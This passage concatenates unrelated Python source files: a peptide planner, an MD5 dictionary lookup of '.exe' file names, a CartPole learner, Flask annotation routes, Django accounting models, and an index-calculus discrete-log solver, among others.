self.num_peptides = num_peptides\n self.monomer_combinations = set()\n\n def create_plan(self):\n\n if not os.path.exists(utils.attach_file_num(self.saver.FILEPATH, self.peptide_length)):\n self.validate_num_peptides()\n self.create_minimum_list()\n self.create_remaining_list()\n self.saver.save(self.monomer_combinations)\n\n def create_minimum_list(self):\n\n for position in range(self.peptide_length):\n for desired_monomer in self.monomers:\n for fillers in self.get_fillers(desired_monomer):\n self.monomer_combinations.add(\n tuple(fillers[0:position] + [desired_monomer['index']] + fillers[position:]))\n\n def create_remaining_list(self):\n monomers = [deepcopy(self.monomers) for _ in range(self.peptide_length)]\n while True:\n for random_sample in utils.random_sample_cartesian_product(*monomers, sample_size=self.num_peptides * 5):\n if len(self.monomer_combinations) > self.num_peptides:\n break\n if self.validate_monomers(random_sample):\n # if len(self.monomer_combinations) % 1000 == 0:\n # print(len(self.monomer_combinations))\n 
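# store each validated sample as a tuple of monomer indices; monomer_combinations is a set, so duplicate draws are silently dropped\n                    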
self.monomer_combinations.add(tuple(monomer['index'] for monomer in random_sample))\n if self.c_cap_eligible(random_sample):\n random_sample += [choice(self.c_cap_monomers)]\n self.monomer_combinations.add(tuple(monomer['index'] for monomer in random_sample))\n else:\n continue\n break\n\n def get_fillers(self, desired_monomer):\n\n while True:\n monomers = list(choices(self.monomers, k=self.peptide_length - 1))\n monomers.append(desired_monomer)\n if self.validate_monomers(monomers):\n yield [monomer['index'] for monomer in monomers[:-1]]\n if self.c_cap_eligible(monomers):\n c_cap = choice(self.c_cap_monomers)\n yield [monomer['index'] for monomer in monomers[:-1]] + [c_cap['index']]\n break\n\n def get_c_cap_monomers(self):\n\n return list(filter(lambda x: x['backbone'] == 'alpha' and x['connection'] == 'methyl' and x['required'], self.monomers))\n\n def validate_monomers(self, monomers):\n\n mw = sum(map(AllChem.CalcExactMolWt, map(lambda x: Chem.Mol(x['binary']), monomers)))\n if mw > PeptidePublicationPlanner.MAX_MW:\n return False\n\n if self.peptide_length < 5 and 3 > len(list(filter(lambda x: x['required'], monomers))):\n return True\n\n if self.peptide_length == 5 and 4 > len(list(filter(lambda x: x['required'], monomers))) > 0:\n return True\n\n return False\n\n def c_cap_eligible(self, monomers):\n\n if self.peptide_length < 5 and 2 > len(list(filter(lambda x: x['required'], monomers))):\n return True\n\n return False\n\n def validate_num_peptides(self):\n\n if self.num_peptides < len(self.monomers) * self.peptide_length:\n raise ValueError('The requested number of peptides needs to be at least as large as the number of monomers'\n ' times the peptide length')\n\n\n# class ConformerPublicationPlanner(IPlanner):\n\n# def __init__(self, peptide_length, num_conformers, num_macrocycles):\n# if num_macrocycles is None:\n# self.macrocycle_loader = project_io.get_macrocycle_io(peptide_length=peptide_length, job_num=None)\n# else:\n# self.macrocycle_loader = None\n# self.num_macrocycles = num_macrocycles\n# self.saver = project_io.ConformerPlannerIO(peptide_length)\n# self.peptide_length = peptide_length\n# self.num_conformers = num_conformers\n\n# def create_plan(self):\n\n# if not os.path.exists(utils.attach_file_num(self.saver.FILEPATH, self.peptide_length)):\n# count = self.count_macrocycles()\n# macrocycle_idxs = list(sample(range(count), self.num_conformers))\n# macrocycle_idxs.sort()\n# self.saver.save(macrocycle_idxs)\n\n# def count_macrocycles(self):\n\n# # total number of macrocycles was given to us\n# if self.macrocycle_loader is None:\n# return self.num_macrocycles\n\n# for i, _ in enumerate(self.macrocycle_loader.iterate()):\n# pass\n\n# return i\n\n\nclass ConformerPublicationPlanner(IPlanner):\n\n def __init__(self, peptide_length, num_conformers, num_macrocycles):\n self.macrocycle_loader = project_io.get_macrocycle_io(peptide_length=peptide_length, job_num=None)\n self.saver = project_io.ConformerPlannerIO(peptide_length)\n self.peptide_length = peptide_length\n self.num_conformers = num_conformers\n\n def create_plan(self):\n\n if not os.path.exists(utils.attach_file_num(self.saver.FILEPATH, self.peptide_length)):\n filepaths = glob.glob(utils.attach_file_num(self.macrocycle_loader.FILEPATH, self.peptide_length, '*'))\n count = 0\n selected_filepaths = set()\n while count < self.num_conformers:\n filepath = choice(filepaths)\n if filepath not in selected_filepaths:\n count += self.count_macrocycles(filepath)\n selected_filepaths.add(filepath)\n\n 
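# persist the sampled macrocycle file list as the conformer plan\n            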
self.saver.save(selected_filepaths)\n\n def count_macrocycles(self, filepath):\n with open(filepath, 'r') as file:\n return len(list(json.load(file)))\n","sub_path":"macrocycles/planners.py","file_name":"planners.py","file_ext":"py","file_size_in_byte":6538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"498269018","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport sys\nimport hashlib\nimport os\n\nif os.path.isfile('american-english'):\n\tfile = 'american-english'\nelse:\n\tfile = '/usr/share/dict/american-english'\n\nhashes = open(sys.argv[1], 'r').read()\n\nwith open(file, 'r') as f:\n\toutput = []\n\tfor line in f:\n\t\th = hashlib.md5(line.rstrip() + '.exe').hexdigest()\n\t\tif h in hashes:\n\t\t\toutput.append(\"{0} - {1}\".format(h, line.rstrip() + '.exe'))\n\tif output:\n\t\tprint('\\n'.join(output))","sub_path":"Hiding_the_hashes.py","file_name":"Hiding_the_hashes.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"287594058","text":"from datetime import datetime\nfrom functionality.Base import Base\nmessage_dict={}\nclass GetByTime(Base):\n def __init__(self):\n super().__init__()\n pass\n \n def get (self,start,end):\n startEpoch=self.dateToEpoch(start)\n endEpoch=self.dateToEpoch(end)\n messages=self.redisDB.zrangebyscore(self.setName,startEpoch,endEpoch, withscores=True)\n return self.parseMessages (messages)\n\n\n def dateToEpoch(self,date):\n try:\n date=datetime.strptime(date, self.dateformat)\n except ValueError:\n raise ValueError(\"Incorrect data format, should be YYYY-MM-DD HH:MM:SS\")\n return int(datetime.timestamp(date))\n\n def parseMessages(self,messages):\n index=0\n for message in messages:\n message=self.parseMessage(message)\n index+=1\n message_dict[index]=message\n return message_dict","sub_path":"functionality/GetByTime.py","file_name":"GetByTime.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"173358872","text":"import math\n\nimport numpy as np\n\nimport gym\n\n\nN_BOXES = 162\nALPHA = 1000\nBETA = 0.5\nGAMMA = 0.90\nLAMBDA_W = 0.95\nLAMBDA_V = 0.9\n\nMAX_FAILURES = 1000\nMAX_STEPS = 100000\n\nONE_DEGREE = 0.0174532\nSIX_DEGREES = 0.1047192\nTWELVE_DEGREES = 0.2094384\nFIFTY_DEGREES = 0.87266\n\n\ndef parse_args():\n pass\n\n\ndef prob_push_right(s):\n return 1.0 / (1.0 + math.exp(-max(-50, min(s, 50.0))))\n\n\ndef get_box(env, state):\n x, x_dot, theta, theta_dot = state\n cart_bound, pole_bound = env.x_threshold, env.theta_threshold_radians\n cart_in_limits = -cart_bound <= x <= cart_bound\n pole_in_limits = -pole_bound <= theta <= pole_bound\n\n if not cart_in_limits or not pole_in_limits:\n return -1\n\n box = (0 if x < -0.8 else\n 1 if x < 0.8 else\n 2)\n\n if x_dot < -0.5:\n pass\n elif x_dot < 0.5:\n box += 3\n else:\n box += 6\n\n if theta < -SIX_DEGREES:\n pass\n elif theta < -ONE_DEGREE:\n box += 9\n elif theta < 0:\n box += 18\n elif theta < ONE_DEGREE:\n box += 27\n elif theta < SIX_DEGREES:\n box += 36\n else:\n box += 45\n\n if theta_dot < -FIFTY_DEGREES:\n pass\n elif theta_dot < FIFTY_DEGREES:\n box += 54\n else:\n box += 108\n\n return box\n\n\ndef main():\n w, v, x_bar, e = np.zeros((4, N_BOXES))\n step, failure_count = 0, 0\n\n env = gym.make(\"CartPole-v0\")\n s = env.reset()\n box = get_box(env, s)\n\n while step < MAX_STEPS and failure_count < 
MAX_FAILURES:\n # env.render()\n\n y = np.random.random() < prob_push_right(w[box])\n e[box] += (1.0 - LAMBDA_W)*(y - 0.5)\n x_bar[box] += 1.0 - LAMBDA_V\n old_p = v[box]\n\n obs, reward, done, _ = env.step(y)\n box = get_box(env, obs)\n\n if box < 0 or done:\n failure_count += 1\n failed = True\n print(\"Trial {} was {} steps.\".format(failure_count, step))\n step = 0\n\n s = env.reset()\n box = get_box(env, s)\n\n r = -1.0\n p = 0.0\n\n else:\n failed = False\n r = 0.0\n p = v[box]\n\n rhat = r + GAMMA*p - old_p\n\n for i in range(N_BOXES):\n w[i] += ALPHA * rhat * e[i]\n v[i] += BETA * rhat * x_bar[i]\n if v[i] < -1.0:\n v[i] = v[i]\n\n if failed:\n e[i] = 0\n x_bar[i] = 0\n else:\n e[i] *= LAMBDA_W\n x_bar[i] *= LAMBDA_V\n\n step += 1\n\n if failure_count == MAX_FAILURES:\n print(\"Pole not balanced. Stopping \"\n \"after {} failures\".format(failure_count))\n\n else:\n print(\"Pole was balanced successfully \"\n \"for at least {} steps.\".format(step))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"worlds/cartpole/sutton.py","file_name":"sutton.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"500919807","text":"# this is to remove those line numbers\nimport os\nimport re\n\ndirectory = \"Current_Cases\"\n\nfor file in sorted(os.listdir(directory),\n key=lambda item: (int(item.partition('_')[2])\n if item[0].isdigit() else float('inf'), item)):\n filename = os.fsdecode(file)\n if filename.endswith(\".txt\"):\n print(os.path.join(directory), str(filename))\n with open(os.path.join(directory, str(filename)), 'r') as f:\n content = f.read()\n # print(content)\n content_new = re.sub(r'\\n(\\d*)\\\\\\.', r'\\n', content)\n f2 = open(os.path.join(directory, str(filename)), \"w+\")\n f2.write(content_new)\n\n # print(\"--------------------------------------------------------------------------------------------\")\n # print(content_new)\n","sub_path":"training_data/current_case_preprocess.py","file_name":"current_case_preprocess.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"604053571","text":"#O(n)\nclass Solution(object):\n def missingNumber(self, nums):\n nums.append(-1)\n i = 0\n while i < len(nums):\n if nums[i] != -1:\n while nums[i] != i:\n if nums[i] == -1: break\n nums[nums[i]], nums[i] = nums[i], nums[nums[i]]\n i += 1\n i = 0\n while i < len(nums):\n if nums[i] != i: return i\n i += 1\n\n\n# sort + binary search\n\nclass Solution(object):\n def missingNumber(self, nums):\n nums.sort()\n i, j = 0, len(nums)-1\n while i 0:\n return redirect(url_for('annotate'))\n else:\n return render_template('home.html', annotations_todo = 0)\n \"\"\"\n evals_todo = Eval.query.filter_by(user_id = int(current_user.get_id()), evaled=False).count()\"\"\"\n return render_template('home.html', annotations_todo = annotations_todo)\n\n\n form = LoginForm()\n return render_template('home.html', form=form)\n\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html', title='About')\n\n\n@app.route(\"/register\", methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = RegistrationForm()\n if form.validate_on_submit():\n hashed_password = bcrypt.generate_password_hash(\n form.password.data).decode('utf-8')\n empty_user = User.query.filter_by(registered=False).first()\n empty_user.username = form.username.data\n 
empty_user.email = form.email.data\n empty_user.password = hashed_password\n empty_user.native_language = form.native_language.data \n empty_user.german_level = form.german_level.data \n empty_user.english_level = form.english_level.data\n empty_user.registered = True\n db.session.commit()\n flash('Your account has been created! You are now able to log in', 'success')\n return redirect(url_for('login'))\n return render_template('register.html', title='Register', form=form)\n\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('annotate'))\n\n form = LoginForm()\n\n if form.validate_on_submit():\n user = User.query.filter_by(email=form.email.data).first()\n\n if user and bcrypt.check_password_hash(user.password, form.password.data):\n login_user(user, remember=form.remember.data)\n next_page = request.args.get('next')\n\n return redirect(next_page) if next_page else redirect(url_for('home'))\n\n else:\n flash('Login unsuccessful. Please check email and password', 'danger')\n\n return render_template('login.html', title='Login', form=form)\n\n\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n return redirect(url_for('home'))\n\n\n@app.route(\"/account\", methods=['GET', 'POST'])\n@login_required\ndef account():\n return render_template('account.html')\n\n\n@app.route(\"/annotate\", methods=['GET', 'POST'])\n@login_required\ndef annotate():\n\n form = AnnotationForm()\n\n if form.validate_on_submit():\n key = int(form.key.data)\n toAnnotate = Annotation.query.filter_by(id=key).first()\n userChoice = None\n if form.userchoice.data == \"marking\":\n userChoice = fb_type.marking\n elif form.userchoice.data == \"postedit\":\n userChoice = fb_type.post_edit\n else:\n userChoice = toAnnotate.feedback_type\n toAnnotate.annotation = form.annotationfield.data\n toAnnotate.time_started = form.timestarted.data\n toAnnotate.time_submitted = form.timesubmitted.data\n toAnnotate.key_strokes = form.keystrokes.data\n toAnnotate.click_count = form.clicks.data\n toAnnotate.time_paused = form.timepaused.data\n toAnnotate.user_choice = userChoice\n toAnnotate.annotated = True\n db.session.commit()\n return redirect('/annotate')\n else:\n print(form.errors)\n\n\n nextAnnotate = Annotation.query.filter_by(\n user_id=current_user.id, annotated=False).order_by(Annotation.id).first()\n\n\n if nextAnnotate == None:\n return redirect('/home')\n\n target = nextAnnotate.target\n target = target.replace('\"', '\\\\\"')\n\n form.key.default = str(nextAnnotate.id)\n form.process()\n if nextAnnotate.feedback_type == fb_type.post_edit:\n instructions = \"Please post-edit the translated sentence below with your improvements.\"\n return render_template('annotate.html', title='Annotate', instructions=instructions, source=nextAnnotate.src, target=target, form=form, fb_type=\"postedit\")\n\n if nextAnnotate.feedback_type == fb_type.marking:\n instructions = \"Please click or highlight incorrect words in the translated sentence below.\"\n return render_template('annotate.html', title='Annotate', instructions=instructions, source=nextAnnotate.src, target=target, form=form, fb_type=\"marking\")\n instructions = \"\"\"Please select either Post Edits or Markings.\n Post Edits: Edit the target sentence with your improvements.\n Markings: Mark incorrect words by clicking or highlighting.\"\"\"\n return render_template('annotate.html', title='Annotate', instructions=instructions, source=nextAnnotate.src, target=target, form=form, 
fb_type=\"userchoice\")\n\n\n@app.route(\"/eval\", methods=['GET', 'POST'])\n@login_required\ndef eval():\n form = EvalForm()\n form.minimum = -1\n form.maximum = 2\n if form.validate_on_submit():\n toEval = Eval.query.filter_by(id=int(form.key.data)).first()\n toEval.better = form.better.data\n toEval.time_paused = form.timepaused.data\n toEval.time_started = form.timestarted.data\n toEval.time_submitted = form.timesubmitted.data\n toEval.click_count = form.clicks.data\n toEval.evaled = True\n db.session.commit()\n return redirect(\"/eval\")\n\n nextEval = Eval.query.filter_by(user_id=current_user.id, evaled=False).first()\n\n if (nextEval == None):\n flash('There are currently no more evaluations for you at this moment.')\n return redirect('/home')\n target1 = nextEval.target1\n target2 = nextEval.target2\n src = nextEval.src\n target1.replace(\"'\", \"\\'\")\n target2.replace(\"'\", \"\\'\")\n choices = [['1', target1], ['2', target2]]\n random.shuffle(choices)\n choices.append(['-1', \"No Preference\"])\n form.key.default = int(nextEval.id)\n form.process()\n choice_json = json.dumps(choices)\n return render_template('eval.html', source=src, form=form, targets=choices, action=\"eval\")\n\n@app.route(\"/ranking\", methods=['GET', 'POST'])\n@login_required\ndef ranking():\n form = EvalForm()\n form.minimum = -1\n form.maximum = 5\n if form.validate_on_submit():\n toRank = Ranking.query.filter_by(id=int(form.key.data)).first()\n better = form.better.data\n toRank.time_paused = form.timepaused.data\n toRank.time_started = form.timestarted.data\n toRank.time_submitted = form.timesubmitted.data\n toRank.click_count = form.clicks.data\n toRank.ranking = str(better)\n toRank.ranked = True\n db.session.commit()\n return redirect(\"/ranking\")\n\n nextRank = Ranking.query.filter_by(user_id=current_user.id, ranked=False).first()\n\n if (nextRank == None):\n flash('There are currently no more evaluations for you at this moment.')\n return redirect('/home')\n target1 = nextRank.target1\n target2 = nextRank.target2\n target3 = nextRank.target3\n target4 = nextRank.target4\n target5 = nextRank.target5\n\n src = nextRank.src\n target1.replace(\"'\", \"\\\\\\'\")\n target2.replace(\"'\", \"\\\\\\'\")\n target3.replace(\"'\", \"\\\\\\'\")\n target4.replace(\"'\", \"\\\\\\'\")\n target5.replace(\"'\", \"\\\\\\'\")\n form.key.default = int(nextRank.id)\n form.process()\n choices = [['1', target1], ['2', target2], ['3', target3], ['4', target4], ['5', target5]]\n random.shuffle(choices)\n choices.append(['-1', \"No Preference\"])\n\n choice_json = json.dumps(choices)\n return render_template('eval.html', source=src, form=form, targets=choices, action=\"ranking\")\n\n","sub_path":"annotproj/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":8627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"235234270","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom app.models.contacts_model import *\nfrom app.models.collects_model import *\nfrom app.models.users_model import *\nfrom app.models.products_model import *\n\nfrom uuid import uuid4\nimport os\n\n#==========================================================================\n# CHANGE PRODUCT FILE NAMES\n#==========================================================================\n#\ndef attachments_rename(instance, filename):\n\n upload_path = 'creditnotes'\n return os.path.join(upload_path,'{}/{}'.format(uuid4().hex, 
filename))\n\n\n#**************************************************************************\n# Journal entry\n#**************************************************************************\n\nclass JournalEntry(models.Model):\n\n JOURNAL_TYPE = (\n ('off', 'off'),\n ('on', 'on'),\n )\n\n SAVE_TYPES = (\n (1, 'save_close'),\n (2, 'save_draft'),\n (3, 'save_downaload'),\n )\n user = models.ForeignKey(User, on_delete = models.CASCADE, db_index = True, null = True,)\n \n journalentry_number = models.CharField(\n max_length = 100,\n db_index = True,\n blank=True,\n null=True,\n\n ) \n\n save_type = models.IntegerField( \n db_index = True,\n default = 1,\n choices = SAVE_TYPES,\n )\n\n journalentry_number_check = models.CharField(\n db_index = True,\n max_length=4,\n default = 'off',\n choices = JOURNAL_TYPE,\n \n ) \n\n journalentry_date = models.DateField(\n auto_now=False,\n auto_now_add=False, \n db_index = True,\n blank= False,\n null= False,\n )\n journalentry_refrence = models.CharField(\n db_index = True,\n max_length=100,\n blank = True,\n null=True\n )\n\n Note = models.CharField(\n max_length = 400,\n blank = True, \n null = True, \n db_index = True,\n )\n\n attachements = models.FileField(\n upload_to = attachments_rename,\n db_index = True,\n blank = True,\n null = True,\n )\n\n total_amount_debit = models.CharField(\n max_length=20,\n db_index = True,\n blank = True,\n null = True,\n )\n\n total_amount_credit = models.CharField(\n max_length=20,\n db_index = True,\n blank = True,\n null = True,\n )\n\n journal_delete_status = models.IntegerField(\n db_index = True,\n default=0,\n blank = False,\n null = False,\n )\n \n def __str__(self):\n return \"{} - {}\".format(self.journalentry_number,self.id) \n\n class Meta:\n verbose_name_plural = 'journal_entry_tbl'\n#**************************************************************************\n# ADD ITEM'S DATA\n#**************************************************************************\n\nclass JournalEntry_Items(models.Model): \n\n user = models.ForeignKey(User, on_delete = models.CASCADE, db_index = True, null = True,)\n\n journalentry = models.ForeignKey(JournalEntry,\n db_index = True,\n blank = True,\n null = True,\n on_delete = models.CASCADE, \n )\n\n accounts_items = models.ForeignKey(\n MajorHeads,\n db_index = True,\n blank = True,\n null = True,\n on_delete = models.CASCADE,\n )\n\n description = models.TextField(\n db_index = True,\n max_length=250,\n blank = True,\n null=True\n )\n\n journal_entry_customer = models.ForeignKey(\n Contacts, \n on_delete = models.SET_NULL, \n db_index = True,\n null = True,\n blank = True,\n )\n\n debit = models.CharField(\n max_length=10,\n db_index = True,\n blank = True,\n null = True,\n )\n\n credit = models.CharField(\n max_length=10,\n db_index = True,\n blank = True,\n null = True,\n )\n\n def __str__(self):\n return \"{} ({})\".format(self.journalentry,self.id) \n\n class Meta:\n verbose_name_plural = 'journalentry_items_tbl'","sub_path":"app/models/journalentry_model.py","file_name":"journalentry_model.py","file_ext":"py","file_size_in_byte":4101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"79020037","text":"# coding: utf-8\n\nfrom django.shortcuts import render\nfrom django.shortcuts import render_to_response\nfrom ucms.models import *\n\n## 全局变量声明这只是个标注并没有什么实际用途{'pageeng_name':(templatelocation,pagech_name)\npages={'index':('backlearning/index.html',u'首页'),\n 'viewlist':('backlearning/list.html',u'NONE'),\n 
'article':('backlearning/article.html',u'列表页'),\n       'error':('backlearning/error.html',u'错误')}\n\ndef index(request):\n    c={}\n    MainBlocks = Block.objects.filter(state = 3)\n    c.update({'MainBlocks':MainBlocks})\n    c.update({'pagename':u'blacksea3的后花园'})\n    return render_to_response('backlearning/index.html',c)\n\ndef viewlist(request,bid):\n    bid = int(bid)\n    c={}\n    MainBlocks = Block.objects.filter(state = 3)\n    CurrentBlock = Block.objects.filter(state = 3, id = bid)\n    MainArticles = Article.objects.filter(bid = bid)\n    c.update({'MainArticles':MainArticles,'MainBlocks':MainBlocks,'CurrentBlock':CurrentBlock[0]})\n    c.update({'pagename':CurrentBlock[0].ch_name})\n    return render_to_response('backlearning/list.html',c)\n\ndef article(request,aid):\n    aid = int(aid)\n    c={}\n    MainBlocks = Block.objects.filter(state = 3)\n    CurrentArticle = Article.objects.filter(id=aid)\n    c.update({'MainBlocks':MainBlocks,'CurrentArticle':CurrentArticle[0],'pagename':CurrentArticle[0].title})\n    return render_to_response('backlearning/article.html',c)","sub_path":"backlearning/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"2177175","text":"# code n.0\ncity = \"Wroclaw\"\ntoday = 6\nprint(\"Today is\", today,\"in\",city)\n# output: Today is 6 in Wroclaw\n\n# code n.1\nmy_age = 28\nyour_age = \"22\"\n# my_age + your_age\n# output: Error ('str' and 'int' do not concatenate with '+')\nprint(my_age, \"+\", your_age, \"=\", my_age + int(your_age))\n# output: 28 + 22 = 50\n\n# code n.2\nmy_age = \"28\"\nyour_age = \"22\"\nprint(my_age + your_age)\n# output: 2822\n# String concatenation\n\n# code n.3\ncity = \"Wroclaw\"\ncountry = \"Poland\"\nprint(city, \"is in\", country)\n# print(country, \"is in\", europe)\n# output: Error ('europe' is undefined)\neurope = \"Europe\"\nprint(country, \"is in\", europe)\n# output: Poland is in Europe\n\n# code n.4\ninitial = \"left\"\nposition = initial\ninitial = \"right\"\nprint(position)\n# output: left","sub_path":"Zajecia 2/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"451699734","text":"from __future__ import division\r\n\r\nimport numpy as np\r\nimport math\r\nfrom functools import reduce\r\nfrom operator import mul\r\n\r\n\r\ndef crt(M, N):\r\n    #Extended Euclidean Algorithm\r\n    prod = reduce(mul, N, 1)\r\n    result = 0\r\n\r\n    for i in range(0, len(M)):\r\n        pp = prod // N[i]\r\n        result += M[i]*pp*modinv(pp,N[i])\r\n    \r\n    return(result % prod)\r\n\r\n#Modular inverse \r\ndef egcd(a, b):\r\n    if a == 0:\r\n        return (b, 0, 1)\r\n    else:\r\n        g, y, x = egcd(b % a, a)\r\n        return (g, x - (b // a) * y, y)\r\n\r\ndef modinv(a, m):\r\n    g, x, y = egcd(a, m)\r\n    if g != 1:\r\n        raise ZeroDivisionError('mod div error')\r\n    else:\r\n        return x % m\r\n\r\n#Factorize over the FactorBase\r\ndef primeFactorsBase(n, factorBase):\r\n    primes = []\r\n    index = 0\r\n    i = factorBase[index]\r\n    \r\n    while i <= n:\r\n\r\n        if n % i == 0:\r\n            primes.append(i)\r\n            n = n // i \r\n        else:\r\n            index += 1\r\n            if index >= len(factorBase):\r\n                return []\r\n            else:\r\n                i = factorBase[index]\r\n    return primes\r\n\r\n#LinearDependence(vector, matrix)\r\ndef linearDep(v, M):\r\n    if(len(M) ==0):\r\n        return False\r\n\r\n    Y = list(M)\r\n    Y.append(v)\r\n    s = np.asarray(v)\r\n    Y = np.asarray(Y)\r\n    \r\n    \r\n    Z = np.asmatrix(Y)\r\n    \r\n    \r\n    numRows, numCols = Z.shape\r\n    \r\n    \r\n    r = 
np.linalg.matrix_rank(Z)\r\n\r\n if(r == min(numRows,len(v))):\r\n return False\r\n else:\r\n return True\r\n \r\ndef Gauss(N, mod):\r\n M = np.copy(N)\r\n n = len(M)\r\n print('------- GAUSS ---------')\r\n print(M)\r\n\r\n for q in range(0,n):\r\n for m in range(0,len(M[0])):\r\n M[q][m] = M[q][m] % mod\r\n\r\n for k in range(0,len(M[0])-1):\r\n maxindex = abs(M[k:,k]).argmax() + k\r\n\r\n #Swap\r\n if maxindex != k:\r\n M[[k,maxindex]]=M[[maxindex,k]]\r\n #Pivot to 1\r\n\r\n if(M[k][k] == 0):\r\n continue\r\n inv = modinv(M[k][k], mod)\r\n M[k] = M[k] * inv % mod\r\n \r\n #Row Below pivot\r\n for row in range(k+1,n):\r\n mult = M[row][k]\r\n print(M)\r\n M[row, k:] = (M[row, k:] - mult * M[k,k:]) % mod\r\n print(M)\r\n print(\"out:\")\r\n print(M)\r\n \r\n return(M)\r\n \r\n#Discrete Log \r\ndef dilog(alpha, factorBase, p, beta, order):\r\n ReducedCoef = []\r\n TabCoef = []\r\n ProcessRow = []\r\n ProcessTable = []\r\n\r\n #k = np.random.randint(max(factorBase)+1,p-1)\r\n k = max(factorBase)+1\r\n C = []\r\n\r\n ######Part 1 Precompute\r\n\t### 4 more vectors because CRT may produce bogus column (not good for GaussAlgo)\r\n while len(TabCoef) < len(factorBase) + 4 :\r\n n = alpha ** k % p\r\n F = primeFactorsBase(n,factorBase)\r\n \r\n \r\n ###### Part 2 Solve log_alpha of factorBase\r\n if( len(F) !=0 ):\r\n #empty list == false\r\n j = 0\r\n while len(F) !=0:\r\n if(F[0] == factorBase[j]):\r\n ReducedCoef.append(F.count(F[0]))\r\n F = F[F.count(F[0]):len(F)]\r\n else:\r\n ReducedCoef.append(0)\r\n j = j+1\r\n\r\n while len(ReducedCoef) < len(factorBase):\r\n ReducedCoef.append(0)\r\n\r\n \r\n if not(linearDep(ReducedCoef,TabCoef)) :\r\n \r\n TabCoef.append(ReducedCoef)\r\n #print(ReducedCoef)\r\n ProcessRow = list(ReducedCoef)\r\n ProcessRow.append(k)\r\n ProcessTable.append(ProcessRow)\r\n\r\n ReducedCoef = []\r\n ReducedF = []\r\n \r\n #k = np.random.randint(max(factorBase)+1,p-1)\r\n k = k + 1\r\n \r\n Syst = np.asarray(ProcessTable)\r\n n=len(Syst)\r\n\r\n ##### No CRT\r\n Out = Gauss(Syst, order)\r\n A = np.delete(Out,len(Syst[0])-1,axis=1)\r\n b = np.delete(Out,[range(0,len(Syst[0])-1)],axis=1)\r\n\r\n x = np.zeros(len(Syst[0]) - 1)\r\n for k in range(len(Syst[0])-2,-1,-1):\r\n dot = np.dot(A[k][k+1:],x[k+1:]) % order\r\n \r\n # 1 = modinv(A[k,k],(p-1)//2))\r\n x[k] = ((b[k] - dot) * 1) % order\r\n print(x)\r\n #print(Out)\r\n\r\n \r\n #####Chinese Remainder Theorem // If needed\r\n\t#### This whole process should be automated\r\n\t#### Here it's computed manually after the mod inverse returning an error\r\n\t################# Not used because order is prime... 
\r\n\t##### CRT options: 2 for Textbook example, 2 + 3 for p=59407\r\n '''Out = Gauss(Syst,order // 6)\r\n \r\n A = np.delete(Out,len(Syst[0])-1,axis=1)\r\n b = np.delete(Out,[range(0,len(Syst[0])-1)],axis=1)\r\n\r\n x = np.zeros(len(Syst[0]) - 1)\r\n\r\n\r\n for k in range(len(Syst[0])-2,-1,-1):\r\n dot = np.dot(A[k][k+1:],x[k+1:]) % ((p-1)//(6))\r\n \r\n # 1 = modinv(A[k,k],(p-1)//2))\r\n x[k] = ((b[k] - dot) * 1) % ((p-1)//(6)) \r\n print(x)\r\n \r\n ##### 2**q possible\r\n Out2 = Gauss(Syst, 2)\r\n print(Out2)\r\n\r\n A2 = np.delete(Out2,len(Syst[0])-1,axis=1)\r\n b2 = np.delete(Out2,[range(0,len(Syst[0])-1)],axis=1)\r\n print(A2)\r\n print(b2)\r\n\r\n y = np.zeros(len(Syst[0]) - 1)\r\n\r\n \r\n for k in range(len(Syst[0])-2,-1,-1):\r\n dot = np.dot(A2[k][k+1:],y[k+1:]) % 2\r\n if A2[k,k] == 0 :\r\n continue\r\n y[k] = ((b2[k] - dot) * 1) % 2\r\n\r\n ###\r\n Out3 = Gauss(Syst, 3)\r\n print(Out3)\r\n\r\n A3 = np.delete(Out3,len(Syst[0])-1,axis=1)\r\n b3 = np.delete(Out3,[range(0,len(Syst[0])-1)],axis=1)\r\n print(A3)\r\n print(b3)\r\n\r\n z = np.zeros(len(Syst[0]) - 1)\r\n\r\n \r\n for k in range(len(Syst[0])-2,-1,-1):\r\n dot = np.dot(A3[k][k+1:],z[k+1:]) % 3\r\n if A2[k,k] == 0 :\r\n continue\r\n z[k] = ((b3[k] - dot) * 1) % 3\r\n \r\n print(\"*******\")\r\n print(x)\r\n print(y)\r\n print(z)\r\n \r\n C = np.zeros(len(Syst[0]) - 1)\r\n for m in range(0,len(C)):\r\n C[m] = crt([x[m],y[m],z[m]],[(p-1)//6,2,3])\r\n \r\n print(C)\r\n '''\r\n #### No CRT ####\r\n C = np.copy(x)\r\n \r\n ######## PART 3: trial on s\r\n \r\n loop = True\r\n s = 0\r\n while loop:\r\n trial = (beta * alpha ** s) % p\r\n F = primeFactorsBase(trial,factorBase)\r\n\r\n #s found\r\n if(len(F) != 0):\r\n loop = False\r\n print(s)\r\n ReducedCoef = []\r\n j = 0\r\n while len(F) !=0:\r\n if(F[0] == factorBase[j]):\r\n ReducedCoef.append(F.count(F[0]))\r\n F = F[F.count(F[0]):len(F)]\r\n else:\r\n ReducedCoef.append(0)\r\n j = 